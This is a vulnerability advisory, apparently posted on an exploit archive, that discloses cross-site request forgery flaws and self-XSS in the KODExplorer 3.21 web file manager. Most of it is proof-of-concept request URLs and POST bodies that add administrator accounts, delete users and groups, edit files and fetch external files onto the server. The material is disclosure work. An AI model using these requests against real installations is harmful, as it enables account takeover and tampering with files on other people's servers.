KODExplorer 3.21 Cross Site Request Forgery

KODExplorer 3.21 Cross Site Request Forgery: Posted Dec 31, 2015; Authored by Ben khlifa Fahmi; KODExplorer web file manager versions 3.21 and below suffer from multiple cross site request forgery vulnerabilities.; tags | exploit, web, csrf; SHA-256 | a6fdbf1e7430218c402b65dfecb7be4c2d6fdca3e63619dbcbe652c22d55ecea; Download | Favorite | View

KODExplorer 3.21 Cross Site Request Forgery


================================================================================
# KODExplorer web file manager  - Cross Site Request Foreign
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================
Description : there is no CSRF token protection on the user management area , an attacker can use the
POC bellow to add , edit , remove any user by sending a link to logged in user with User Management privilege

# PoC :
Add user :
http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator

Delete User:
http://localhost/index.php?member/del&name=[username]

Edit User:
http://localhost/index.php?member/edit&name=[username]&name_to=[new_username]&role_to=[new_group]&password_to=[new_password]

Patch released : Check my git https://github.com/benkhlifafahmi/KODExplorer
================================================================================
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group



Additional CSRF Issues:

I - CSRF Group Managment :
  Description : an attacker can add , remove or edit any User Group by sending an exploit link to a  loggeed in admin.
  
  Vulnerable Controller : group.class.php
  Proof of Concept : 
    #Add Group : POST Request 
        action url : http://localhost/index.php?group/add&role=[group name]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..]
        POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
    
    #Edit Group : POST Request 
        action url : http://localhost/index.php?group/add&role_old=[group name to edit]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..]
        POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
     
    #Delete Group : http://localhost/index.php?group/del&role=[group_name]


------------------------------------------------------------------------
II - CSRF on File Managment : 
  Description : an attacker can add , upload file from external site , delete or edit  file/path by sending a link to a logged in administrator.

  Vulnerable Controller : explorer.class.php

  Proof of Concept   :  
    #Add a file(1) : http://localhost/index.php?explorer/mkfile&path=[file name]
    #Delete file   : POST Request 
          action URL:  http://localhost/index.php?explorer/pathDelete
          post data : list[[{"type":"file","path":"[path to file you want to remove]"}]]
    #Upload File(2):  http://localhost/index.php?explorer/serverDownload&type=download&save_path=[path where to save file]&url=[url to external file]&uuid=[any uuid you want]

    #Edit file     : POST Request
          action URL:POST http://localhost/index.php?editor/fileSave 
           Post Data: path[path to file]\ncharset[utf-8]\nfilestr[[file content]]


------------------------------------------------------------------------



III - CSRF on App Managment : 
    Description : an attacker can add, edit , remove any app by sending a link to a logged in admin.
    
    Vulnerable Controller : app.class.php

    Proof of Concept : 
      #Add app : POST request
        action url : http://localhost/index.php?app/add&name=a
        POST DATA  : data[%257B%2522type%2522%253A%2522url%2522%252C%2522content%2522%253A%2522[url of your app]%2522%252C%2522group%2522%253A%2522others%2522%252C%2522name%2522%253A%2522[you app name]%2522%252C%2522desc%2522%253A%2522[you app description]%2522%252C%2522icon%2522%253A%2522oexe.png%2522%252C%2522width%2522%253A%2522800%2522%252C%2522height%2522%253A%2522600%2522%252C%2522simple%2522%253A0%252C%2522resize%2522%253A1%257D]

      #Delete App : http://localhost/index.php?app/del&name=[your app]


-------------------------------------------------------------------------
IV - Multiple Self XSS:
    Description : the KODExplorer suffer from many Self XSS, vulnerable module to XSS are , Username , App Name , App Source , Folder Name , File Name , Group Name. to execute it just inject html code as one of the vulnerable module above.


-------------------------------------------------------------------------
V  - Solution : 
  I have released a fix on my github account you can clone it or just wait for a patch to be released on the next version as i have reported all possible vulnerability ,

-------------------------------------------------------------------------


Thanks : I want to say "thank you" for:
  - Tunisian Whitehats Security (@WhitehatsTN) http://www.whitehats.tn
  - Arab Oracle Users Group (@araboug) http://www.araboug.org
    - @RaisoMos , @tws_bayrem , @tws_charfeddine , @achref_vip , @tws_amine.
Special Greetz to my fiancy.

Top Authors In Last 30 Days

Red Hat 291 files
Ubuntu 63 files
LiquidWorm 29 files
indoushka 20 files
Debian 19 files
Apple 10 files
Google Security Research 7 files
Chokri Hammedi 3 files
Jann Horn 3 files
Emiliano Febbi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,154)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,795)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,227)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,962)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

KODExplorer 3.21 Cross Site Request Forgery

KODExplorer 3.21 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

KODExplorer 3.21 Cross Site Request Forgery

Share This

KODExplorer 3.21 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems